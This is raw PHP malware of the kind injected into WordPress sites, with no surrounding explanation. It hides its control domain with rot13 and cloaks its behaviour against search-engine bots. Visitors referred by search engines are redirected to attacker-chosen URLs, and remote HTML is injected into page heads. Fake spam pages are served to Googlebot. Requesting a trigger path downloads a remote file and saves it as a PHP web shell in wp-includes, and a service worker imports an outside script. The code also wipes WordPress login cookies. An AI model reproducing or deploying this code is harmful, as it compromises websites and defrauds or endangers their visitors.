if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } }
if (!function_exists('in_array_like')) { function in_array_like($referencia,$array){ foreach($array as $ref){ if (strstr($referencia,$ref)){ return true; } } return false; } }
if (!function_exists('cacheUrlnew')) { function cacheUrlnew($u, $h) { $cachetime = 600; $file = ABSPATH . WPINC . '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time()) { $curl = curl_init($u); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($curl, CURLOPT_POSTFIELDS, "h=" . $h); curl_setopt($curl, CURLOPT_TIMEOUT, 15); $data = curl_exec($curl); curl_close($curl); if ($data) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } }
if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } }
if(!function_exists('grs')){function grs($length=10){$characters='abcdefghijklmnopqrstuvwxyz';$charactersLength=strlen($characters);$randomString='';for($i=0;$i<$length;$i++){$randomString.=$characters[random_int(0,$charactersLength-1)];}return $randomString;}}
$gbt = getUserIP();
$uag = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['HTTP_HOST'];
$hwost = strtolower ($_SERVER['HTTP_HOST']);
$ref = '';
if(isset($_SERVER['HTTP_REFERER'])) { $ref = $_SERVER['HTTP_REFERER']; };
$uri = $_SERVER['REQUEST_URI'];
$id = $_SERVER['REQUEST_URI'];
$googleBot = false;
$bingBot = false;
$anyBot = false;
$ccd = str_rot13('mnuunuu.qvtvgny');
$blA = [];
$prototo = isHttps();
$gbots = array( 'googlebot', 'googledocs', 'googleother', 'feedfetcher', 'google-safety', 'googleweblight' ); if (in_array_like(strtolower($uag), $gbots)){ $googleBot = true; }
$anybots = array( 'msie 6.0', 'fasthttp', 'claudebot', 'gptbot', 'friendlycrawler', 'censysinspect', 'paloaltonetworks', 'rackspace', 'uptime', 'keys-so-bot', 'repolookoutbot', 'l9scan', 'zabbix', 'awario', 'geedo', 'blackbox', 'tinytest', 'dreamweb', 'phxbot', 'mozlila', 'moblile', 'the knowledge ai', 'newspaper', 'wp rocket','wp fastest cache preload bot','java','ifatsearch', 'dataforseobot', 'simplepie_useragent','site24x7','buck','go http package','krzana bot','okhttp','mailpoet cron','alittle client','woocommerce','dreamhost sitemonitor','sucuri uptime monitor','twitterbot','mod_pagespeed_na','axios','re-re studio','serf','python','itms','shipmondo','empty user agent','duckduckbot','df bot','hummingbird','sitelock','grequests','keybot','wedos','installatron','scalaj-http','dalvik','spotify','razorpay','elb-healthchecker','wpmudev','foregenix','semanticjuice','simplepie','pingdom','freshpingbot','8legs','statuscake','ioncrawl','rome client','reeder','ping.blo.gs','btwebclient','livedoor','postmanruntime', 'wget', 'rytebot','rss','zoombot','spark','scrapy','mediatoolkitbot','firmograph','universalfeedparser', 'uptimerobot', 'facebookexternalhit', '360spider', 'baidubot', 'advbot', 'ahrefs', 'aport', 'blexbot', 'barkrowler', 'curl', 'ccbot', 'redditbot', 'bdcbot', 'birdcrawlerbot', 'aragna', 'crazywebcrawler', 'contxbot', 'checkmarknetwork', 'crowsnest', 'dataminer', 'deusu', 'domaincrawler', 'domainsonocrawler', 'domaintools', 'dotbot', 'exabot', 'flightdeckreportsbot', 'go-http-client', 'httrack', 'mj12bot', 'mauibot', 'megaindex', 'mojeekbot', 'cognitiveseo', 'moreover', 'netcraft', 'netpeakchecker', 'nimbostratus', 'sidetrade', 'yellowbrand', 'nextdoorbot', 'brightbot', 'wiederfreibot', 'startmebot', 'monsidobot', 'jaddjabot', 'ad-standards-bot', 'atomseobot', 'zelistbot', 'konturbot', 'nutch', 'panopta', 'paperlibot', 'petalbot', 'safednsbot', 'seekport', 'semrush', 'seznambot', 'site-shot', 'zombiebot', 'seobility', 'socialsearcher', 'sogou', 'teleport', 'turnitinbot', 'wordpress', 'xovibot', 'yandex.com/bots', 'amazonbot', 'yisou', 'seolizer', 'zoominfobot', 'blogmurabot', 'domainstats', 'ezooms', 'fluid', 'snapchat', 'adbeat_bot', 'ezlynx', 'awariosmartbot', 'wellknownbot', 'bne.es_bot', 'gaisbot', 'newslitbot', 'neticle', 'sansanbot', 'hrankbot', 'linkdexbot', 'ltx71', 'orbbot', 'finbot', 'pagepeeker', 'owler', 'gigabot', 'madbot', 'majestic', 'bidswitchbot', 'linkfluence', 'semanticbot', 'linkwalker', 'msnbot', 'webgains', 'auskunft', 'cxense', 'amazonadbot', 'jooblebot', 'slackbot', 'bitlybot', 'elsemanariobot', 'x28', 'metorik', 'nagios', 'bomborabot', 'adsbot', 'pinterest', 'mbcrawler', 'mjj12bot', 'yetibot', 'cocolyzebot', 'superfeedr', 'mail.ru_bot', 'booking.com', 'archiver', 'coccocbot', 'neevabot', 'seokicks', 'sitechecker', 'applebot', 'archive.org_bot', 'cincraw', 'feedbot', 'surdotlybot', 'intelx.io_bot', 'bublupbot', 'vuhuvbot', 'serendeputy', 'superpagesbot', 'detectify', 'kinsta', 'taboolabot', 'infotigerbot', 'netEstate', 'pirst', 'python-requests', 'randomsurfer', 'rogerbot', 'semtix', 'serpstatbot', 'solomono', 'spider', 'statdom', 'trendictionbot', 'ucrawler', 'urllib', 'verifying', 'viralvideochart', 'zgrab'); if (in_array_like(strtolower($uag), $anybots)){ $anyBot = true; }
if ( preg_match( "#bingbot|BingPreview#i", $uag ) ) { $bingBot = true; }
if(empty($anyBot) && empty($bingBot) && empty($googleBot)) {
$ipresponse = cacheUrlnew("https://api.{$ccd}/check_new.php", $hwost);
$blA = explode('|', $ipresponse);
}
if ($anyBot || in_array($gbt, $blA)) {
//do
} else {
if (!preg_match("#qutam-|/b24c-|/ccoin-|/dcoin-|/decoin-|/decoin25-|/neivu-|/nrcc-|=\.\.|login|\/author\/admin|verification|eezee|suspected|edit\.php|deleteme|ping=|verification|\/-\/-\/|\/wp\/v2\/users\/|phpmailer|wordfence|wp_cron|php:\/\/|wp-22\.php|ququo|uuuuxxxxooo|xmlrpc|here=1111|favicon|@narjas|@print|ExV1|\/aaaffff123|\/alfa-rex|\/alfanew|wp-cron|\/ayashoo-|\/books-|\/datez-|\/filemanager|\/kaupan-|\/kjope-|\/livres-|\.env\.|\/marijuana|\/oerzrsld|\/pgxhtogrzm-|\/tczuqaat|\/wlwmanifest|\/wp-admin|\/wp-consar|\/wp-content\/|\/wp-includes\/|\/wp-plain|\/wso112233|\.ashx|worm0|archivarix|\/wsoyanz|\/xl2023|\?a=display&template|\?author=|\?bx=0e|\?s=captcha|\?test=|concat|cdnstaticjs|config|cryptocdn|execute-solution|get-pixels|get_refreshed|imagescdn|invokefunction|shell|usage_|well-known\/|wp-comments-post|wp-json|wp-session-url|xmrlpc|phpinf|config|\.(?:env|jpg|js|pdf|png|svg|ttf|txt|woff|xml|zip|ico|css|asp|gz|rar|sql|gif|json|aspx|exe|xls|csv|ppt|alfa|local|jsp|pptx|xlsx|doc|tgz|tar|bak|7z|xsd|bz2|backup|ini|yaml|jar|passwd|cgi|sh|log|jpeg|BAK)$|export#", $uri) && !$googleBot && !$bingBot ) {
$ch = curl_init();
$url_string = "https://source.{$ccd}/in/redn/?val1={$hwost}";
curl_setopt ($ch, CURLOPT_URL, $url_string); curl_setopt ($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_HEADER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 10); curl_setopt ($ch, CURLOPT_REFERER, $host.$uri); curl_setopt ($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec ($ch); if ( curl_getinfo($ch, CURLINFO_REDIRECT_URL ) ) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL ); header('Location: ' . $redirectUrl); exit(); } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $header = substr($html, 0, $header_size); $html = substr($html, $header_size); curl_close($ch); function yuhoo($html) { echo $html; } add_action('wp_head', function() use ( $html ) { yuhoo( $html ); } );
//
}
/*
if (preg_match("#www.google.com/bot.html#i", $uag) && !preg_match("/\/post-|\/pgxhtogrzm-|\/livres-|\/datez-|\/books|\/qutam-|\/neivu-|\/ccoin-|\/dcoin-|\/decoin-|\/decoin25-|imagescdn|cryptocdn|-mk|-mk2|-mk3|-mk4|\/b24c-|\/nrcc-|\/kjope-|\/kaupan-|\/ayashoo-/", $id)) { $curl = curl_init("http://api.{$ccd}/301.php"); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($curl); curl_close($curl); if (preg_match('#http#', $response)){ header("HTTP/1.1 301 Moved Permanently"); header('Location: ' . $response); exit(); } }
*/
/*
$nzTables = array('pcachewpr', 'lcachewpr', 'lmcachewpr');
foreach ($nzTables as $nz) {
$table_name = $wpdb->prefix . $nz;
if ($wpdb->get_var("SHOW TABLES LIKE '$table_name'") == $table_name) {
$sql = "DROP TABLE IF EXISTS $table_name";
$wpdb->query($sql);
$curl = curl_init("http://api.{$ccd}/checktable.php");
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $_SERVER['HTTP_HOST'] . ';' . $table_name);
$response = curl_exec($curl);
curl_close($curl);
}
}
*/
if (preg_match("#^(/qutam-|/ccoin-|/decoin-|/decoin25-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|/neivu-)#", $_SERVER['REQUEST_URI']) || preg_match('#.+-mk\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk3\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk4\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk2\/?$#', $_SERVER['REQUEST_URI'])) { if (!class_exists('CovenVP', FALSE)) { class CovenVP { private $args = NULL; public function __construct($args) { if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); $this->args = $args; add_filter('the_posts', array($this, 'virtual_page')); } public function virtual_page($posts) { global $wp; $slug = isset($this->args['slug']) ? $this->args['slug'] : ''; if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { $post = new stdClass(); $post->ID = - 128; $post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; $post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); $post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); $post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; $post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->post_password = ''; $post->post_name = $slug; $post->to_ping = ''; $post->pinged = ''; $post->post_modified = $post->post_date; $post->post_modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $slug); $post->menu_order = 0; $post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; $post->post_mime_type = ''; $post->comment_count = 0; $post = apply_filters('coven_virtual_page_content', $post); $posts = array($post); global $wp_query; $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; } return $posts; } } } if (!function_exists('coven_create_virtual')) { function coven_create_virtual() { $requri = explode('-', $_SERVER['REQUEST_URI']); $scheme = end($requri); $scheme = trim($scheme, '/'); $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/{$scheme}/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); $html = json_decode($html, true); curl_close($ch); if (json_last_error() === JSON_ERROR_NONE) { $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); $pg = new CovenVP($args); } } } if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { $rUri = explode('-', $_SERVER['REQUEST_URI']); $rScheme = end($rUri); $rScheme = trim($rScheme, '/'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://source.{$ccd}/in/{$rScheme}/?val1={$hwost}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_REFERER, $host . $uri); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec($ch); if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); header('Location: ' . $redirectUrl); exit(); } } /* elseif ($googleBot) { add_action('init', 'coven_create_virtual'); }*/ else { header("Location: http://" . $_SERVER["HTTP_HOST"]); exit(); } }
if (preg_match("#xmlrpc\.php$#", $id)) { echo "XML-RPC server accepts POST requests only."; exit(); }
if (preg_match("/serviceworker.js$|332.js$|34334$/", $id) ) { header('Content-Type: application/javascript'); echo 'self.importScripts(\'https://magictt1.com/sw/magic.js\');'; exit; }
if (preg_match_all("/headssr\.php$/", $id, $matches) ) { $fileUrl = "http://api.{$ccd}/lnk/sh.txt"; $saveTo = ABSPATH . WPINC . '/abcsss.php'; if ( is_file ($saveTo) && filesize ($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1 ) { } else { $fp = fopen($saveTo, 'w+'); $ch = curl_init($fileUrl); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_exec($ch); curl_close($ch); fclose($fp); } }
if (preg_match("#^/tmp/#", $_SERVER['REQUEST_URI'])) {
$url = str_replace('/tmp', '', $_SERVER['REQUEST_URI']);
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/books_files/tmp{$url}");
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$html = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $html;
die();
}
if (preg_match("#^/books_files/#", $_SERVER['REQUEST_URI'])) {
$url = str_replace('?id', '.php?id', $_SERVER['REQUEST_URI']);
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}{$url}");
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$html = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $html;
die();
}
if (preg_match("#^/books-#", $_SERVER['REQUEST_URI'])) {
if (!class_exists('WP_EX_PAGE_ON_THE_FLY', FALSE)){
class WP_EX_PAGE_ON_THE_FLY
{
public $slug ='';
public $args = array();
public function __construct($args){
add_filter('the_posts',array($this,'fly_page'));
$this->args = $args;
$this->slug = $args['slug'];
}
public function fly_page($posts){
global $wp,$wp_query;
$page_slug = $this->slug;
if(count($posts) == 0 && (strtolower($wp->request) == $page_slug || $wp->query_vars['page_id'] == $page_slug)){
$post = new stdClass;
$post->post_author = 1;
$post->post_name = $page_slug;
$post->guid = get_bloginfo('wpurl' . '/' . $page_slug);
$post->post_title = 'page title';
$post->post_content = "Fake Content";
$post->ID = -42;
$post->post_status = 'static';
$post->comment_status = 'closed';
$post->ping_status = 'closed';
$post->comment_count = 0;
$post->post_date = current_time('mysql');
$post->post_date_gmt = current_time('mysql',1);
$post = (object) array_merge((array) $post, (array) $this->args);
$posts = NULL;
$posts[] = $post;
$wp_query->is_page = true;
$wp_query->is_singular = true;
$wp_query->is_home = false;
$wp_query->is_archive = false;
$wp_query->is_category = false;
//status_header( 200 );
unset($wp_query->query["error"]);
$wp_query->query_vars["error"]="";
$wp_query->is_404 = false;
}
return $posts;
}
}
}
$requri = explode('-', $_SERVER['REQUEST_URI']);
$scheme = end($requri);
$scheme = trim($scheme, '/');
$url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/');
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/books/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]);
$html = curl_exec($ch);
curl_close($ch);
unset($ch);
//
if($googleBot){
$html = json_decode($html, true);
$args = array('slug' => $url, 'post_title' => $html['title'], 'post_content' => $html['body']);
new WP_EX_PAGE_ON_THE_FLY($args);
} else{
echo $html;
die();
}
}
$pdfhash = substr(str_rot13(preg_replace('#[^0-9a-zA-Z]#', "", $_SERVER['HTTP_HOST'])) , 0, 5);
if (preg_match('#^/wp-content/uploads/.+' . $pdfhash . '.pdf$#', $_SERVER['REQUEST_URI']))
{
$covenD = str_rot13('mnuunuu.qvtvgny');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/pdf/books1/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt));
curl_setopt($ch, CURLOPT_REFERER, $ref);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$html = curl_exec($ch);
if ( curl_getinfo($ch, CURLINFO_REDIRECT_URL ) ) {
$redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL );
header('Location: ' . $redirectUrl); exit();
}
curl_close($ch);
unset($ch);
if (empty($html))
{
http_response_code(404);
exit();
}
if ($googleBot)
{
header("Content-type:application/pdf");
}
echo $html;
exit();
}
/*
$chdoms = curl_init( "http://api.{$ccd}/data/check_doms.txt" ); curl_setopt ($chdoms, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($chdoms, CURLOPT_HEADER, 0); curl_setopt ($chdoms, CURLOPT_TIMEOUT, 20); curl_setopt ($chdoms, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); $chDomains = curl_exec ($chdoms); curl_close($chdoms); $chDomains = preg_split('/\n|\r\n?/', $chDomains); if ( !preg_match ( "#/post-|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|-mk|-mk2|-mk3|-mk4#", $id ) && $googleBot && in_array( $hwost, $chDomains ) ) { function supermario($content) { $ccd = str_rot13('mnuunuu.qvtvgny'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("http://coven.{$ccd}/links/schemenameururu/{$hwost}{$uri}" . rand() ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; }
add_filter('the_content', 'supermario', 20);
}
*/
/*
if ( !preg_match ( "#/post-|feed|robots|jpg|png|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|-mk|-mk2|-mk3|-mk4#", $id ) && preg_match('#Googlebot#', $uag) ) { function supermario($content) { $ccd = str_rot13('mnuunuu.qvtvgny'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("https://coven.{$ccd}/links2/uru2/{$hwost}{$uri}" ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; }
add_filter('the_content', 'supermario', 20);
}
*/
function add_meta_cache() { echo ' '; echo ' '; echo ' '; echo ' '; echo ' '; } add_action('wp_head', 'add_meta_cache');
if (preg_match('#/(imagescdn|cryptocdn)/.+#', $id) ) {
$picUrl = "https://images.{$ccd}{$id}";
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $picUrl);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt));
$html = curl_exec ($ch);
curl_close($ch);
header('Cache-Control: public');
header('Content-Type: image/jpeg');
echo $html;
exit;
}
if (preg_match("#pgxhtogrzm#", $_SERVER['REQUEST_URI'])){ if (!class_exists('CovenVP', FALSE)) { class CovenVP { private $args = NULL; public function __construct($args) { if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); $this->args = $args; add_filter('the_posts', array($this, 'virtual_page')); } public function virtual_page($posts) { global $wp; $slug = isset($this->args['slug']) ? $this->args['slug'] : ''; if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { $post = new stdClass(); $post->ID = - 128; $post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; $post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); $post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); $post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; $post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->post_password = ''; $post->post_name = $slug; $post->to_ping = ''; $post->pinged = ''; $post->post_modified = $post->post_date; $post->post_modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $slug); $post->menu_order = 0; $post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; $post->post_mime_type = ''; $post->comment_count = 0; $post = apply_filters('coven_virtual_page_content', $post); $posts = array($post); global $wp_query; $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; } return $posts; } } } if (!function_exists('coven_create_virtual')) { function coven_create_virtual() { $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/shilov/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); $html = json_decode($html, true); curl_close($ch); if (json_last_error() === JSON_ERROR_NONE) { $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); $pg = new CovenVP($args); } } } if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://source.{$ccd}/in/drws/?val1={$hwost}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_REFERER, $host . $uri); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec($ch); if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); header('Location: ' . $redirectUrl); exit(); } } elseif ($googleBot) { add_action('init', 'coven_create_virtual'); } else { header("Location: http://" . $_SERVER["HTTP_HOST"]); exit(); } }
if(!$googleBot){
if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } }
}
if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } }
